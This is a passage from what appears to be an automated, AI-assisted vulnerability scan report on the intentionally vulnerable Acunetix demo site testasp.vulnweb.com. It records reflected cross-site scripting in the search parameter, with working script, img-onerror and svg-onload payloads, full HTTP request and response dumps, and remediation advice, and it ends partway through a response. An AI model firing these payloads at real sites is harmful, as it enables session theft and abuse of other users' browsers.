Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=POJMJFOBJHKMJCAOIEOJLALL; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3826


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Csvg%252Fonload%253Dalert%25281%2529%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Csvg%252Fonload%253Dalert%25281%2529%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<svg/onload=alert(1)>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary9. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <script>alert(1)</script> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<script>alert(1)</script>
Detection Heuristic
XSS payload reflected unencoded: <script>alert(1)</script> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=NOJMJFOBPIFMBIHBALDIBJHC; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3846


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<script>alert(1)</script>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary10. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <script>alert(document.domain)</script> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<script>alert(document.domain)</script>
Detection Heuristic
XSS payload reflected unencoded: <script>alert(document.domain)</script> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MOJMJFOBOHALJLFBFOGCFMNB; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3129


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%2528document%2Edomain%2529%253C%252Fscript%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cscript%253Ealert%2528document%2Edomain%2529%253C%252Fscript%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<script>alert(document.domain)</script>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary11. Cross-Site Scripting (Reflected) ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-79 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 19:43:25
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E
Vulnerable Parameter
tfSearch
Detail
XSS payload reflected unencoded: <img src=x onerror=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
Payload
<img src=x onerror=alert(1)>
Detection Heuristic
XSS payload reflected unencoded: <img src=x onerror=alert(1)> (text/html response; payload survives in body without HTML-entity-encoding -- structural proof of XSS regardless of AI verdict)
AI Confidence
95%
HTTP Request
Full request
GET /Search.asp?tfSearch=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=KOJMJFOBJKAPDMDLNLKLLGCN; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:43:25 GMT
Content-Length: 3863


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3D%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for '<img src=x onerror=alert(1)>'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:25 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr><tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>admin</b> on 11/9/2005 12:16:35 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='path'>Found in: <a href='showforum.asp?id=1'>Weather</a>/<a href='showthread.asp?id=0'>1</a></div><div class='posttitle'>1</div><div class='posttext'>1</div></td></tr></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Cross-site scripting (XSS) arises when an application takes data that originated in an HTTP request and embeds it into a response without sufficient validation or output encoding, allowing an attacker to inject script that executes in the browser of another user. The injected script runs in the security context of the vulnerable origin, so it can read and exfiltrate the victim's session cookies and tokens, perform any action the victim is authorised to perform, capture keystrokes and form data, deface the page, or pivot to attack other applications that trust the same origin.

Reflected XSS echoes the input straight back in the immediate response and is typically delivered via a crafted link; stored XSS persists the input and fires for every user who views the affected content; DOM-based XSS occurs entirely client-side when JavaScript writes untrusted data into a dangerous sink. Impact ranges from low (a brochure site with no authentication) to critical (banking, admin consoles, or any same-origin sensitive function).

Remediation

Apply defence in depth at the point where data is written into a response:

  • Context-aware output encoding - HTML-encode untrusted data on output, selecting the encoding for the exact sink (HTML body, HTML attribute, JavaScript, URL, or CSS context). Prefer a framework's auto-escaping template engine over manual encoding.
  • Input validation - validate on arrival against a strict allow-list (type, length, character set); reject rather than sanitise.
  • Avoid dangerous sinks - do not pass untrusted data to innerHTML, document.write, eval, or framework HTML-bypass directives (dangerouslySetInnerHTML, v-html, [innerHTML]); use safe DOM APIs such as textContent.
  • Content-Security-Policy - deploy a strict, nonce/hash-based CSP as a second line of defence to limit the impact of any residual injection.
  • Cookie hardening - set HttpOnly on session cookies so injected script cannot read them.
↩ Glossary12. Reflected XSS in 'tfSearch' parameter
Severity: High  |  Confidence: Firm  |  CWE: CWE-79 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The 'tfSearch' query parameter is echoed into the HTML response body inside the search-results block. The submitted value 'test' is reflected verbatim as "You searched for 'test'" with no evidence of output encoding, so an attacker-supplied value containing HTML/script markup would likely execute in the victim's browser. A crafted request such as tfSearch=</div><script>alert(1)</script> should confirm this.
AI Confidence
78%
Evidence
<div class='path'>You searched for 'test'</div>
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
